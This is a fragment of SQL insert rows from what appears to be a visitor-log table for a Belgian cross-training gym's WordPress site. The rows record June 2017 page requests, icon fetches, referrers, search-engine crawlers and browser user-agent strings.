(74948, 1497198568.701108, 3657081847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74949, 1497203406.825177, 1463837825, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74950, 1497203422.467764, 1463837825, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74951, 1497203431.518380, 1463837825, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74952, 1497203748.743953, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(74953, 1497203749.229045, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74954, 1497203749.696082, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74955, 1497203750.104103, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74956, 1497203750.589737, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74957, 1497203750.993965, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74958, 1497203751.391111, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74959, 1497203751.870828, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74960, 1497203752.268423, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74961, 1497203752.663980, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74962, 1497203753.057332, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74963, 1497203753.541443, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74964, 1497203753.957448, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74965, 1497203754.406687, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74966, 1497206186.559046, 2637637594, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74967, 1497206373.181227, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74968, 1497206373.801724, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74969, 1497206374.243162, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74970, 1497206374.698905, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74971, 1497206375.227572, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74972, 1497206375.839629, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74973, 1497206376.676870, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74974, 1497206377.236079, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74975, 1497206377.826601, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74976, 1497206378.273529, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74977, 1497206379.378430, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74978, 1497214852.769759, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74979, 1497215166.869703, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(74980, 1497215167.326365, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74981, 1497215167.760719, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74982, 1497215168.172784, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74983, 1497215168.682122, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74984, 1497215169.144708, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74985, 1497215169.563626, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74986, 1497215170.066064, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74987, 1497215170.658985, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74988, 1497215171.059018, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74989, 1497215171.486490, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74990, 1497215172.015715, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74991, 1497215172.418849, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74992, 1497215172.888365, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74993, 1497215955.610666, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(74994, 1497215955.634211, 3024883483, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(74995, 1497216062.477671, 3024883590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74996, 1497217434.896541, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74997, 1497217436.855975, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74998, 1497217822.832633, 3657081847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74999, 1497227159.862058, 3657081847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75000, 1497227215.526166, 2637637428, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75001, 1497240955.962740, 1338305640, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75002, 1497242391.982509, 3024883606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75003, 1497243485.772593, 1338305640, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75004, 1497243586.414684, 583939196, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'rogerbot/1.1 (http://moz.com/help/guides/search-overview/crawl-diagnostics#more-help, rogerbot-crawler+pr4-crawler-15@moz.com)'),
(75005, 1497243596.886788, 583939196, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'rogerbot/1.1 (http://moz.com/help/guides/search-overview/crawl-diagnostics#more-help, rogerbot-crawler+pr4-crawler-15@moz.com)'),
(75006, 1497243598.723655, 583939196, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'rogerbot/1.1 (http://moz.com/help/guides/search-overview/crawl-diagnostics#more-help, rogerbot-crawler+pr4-crawler-15@moz.com)'),
(75007, 1497246351.108796, 3512711304, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(75008, 1497246755.120348, 1338305640, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75009, 1497247580.310087, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75010, 1497247582.369843, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75011, 1497247584.408972, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75012, 1497247587.066876, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75013, 1497247590.158065, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75014, 1497247592.792196, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75015, 1497247595.342810, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75016, 1497247597.892797, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75017, 1497247600.190827, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75018, 1497247602.634000, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75019, 1497247604.832484, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75020, 1497247607.967567, 96317622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(75021, 1497250081.458511, 3166510073, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75022, 1497250083.643460, 3166510073, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75023, 1497250083.678159, 3166510073, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75024, 1497250084.304004, 3166510073, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(75025, 1497251685.504260, 1338305640, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75026, 1497254209.691603, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75027, 1497254210.452374, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75028, 1497254226.960594, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75029, 1497254244.502228, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75030, 1497254261.771226, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75031, 1497254274.786548, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75032, 1497254280.381282, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75033, 1497254288.651583, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75034, 1497254305.930805, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75035, 1497254317.265348, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75036, 1497254328.305432, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75037, 1497254339.801836, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75038, 1497254350.296015, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(75039, 1497255686.414385, 1439283878, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75040, 1497255689.237427, 1439283878, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75041, 1497259090.853924, 2731721828, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75042, 1497259093.352276, 2731721828, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75043, 1497260318.112223, 1338305640, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75044, 1497269496.822816, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(75045, 1497270460.575101, 2637637428, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75046, 1497271236.222216, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75047, 1497271236.719861, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75048, 1497279326.497982, 3180686846, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(75049, 1497279967.987046, 3587417960, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75050, 1497279968.906365, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75051, 1497283329.078266, 676177710, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75052, 1497283766.167221, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75053, 1497286835.238662, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75054, 1497286835.863318, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75055, 1497286836.358046, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75056, 1497286836.899343, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75057, 1497286837.557344, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75058, 1497286838.274939, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75059, 1497286838.771453, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75060, 1497286839.596852, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75061, 1497286840.167267, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75062, 1497286840.652017, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75063, 1497286841.205777, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75064, 1497286841.737838, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75065, 1497286842.216620, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75066, 1497286842.726239, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75067, 1497286986.783796, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75068, 1497287079.352402, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75069, 1497287079.826553, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75070, 1497287080.292088, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75071, 1497287080.711997, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
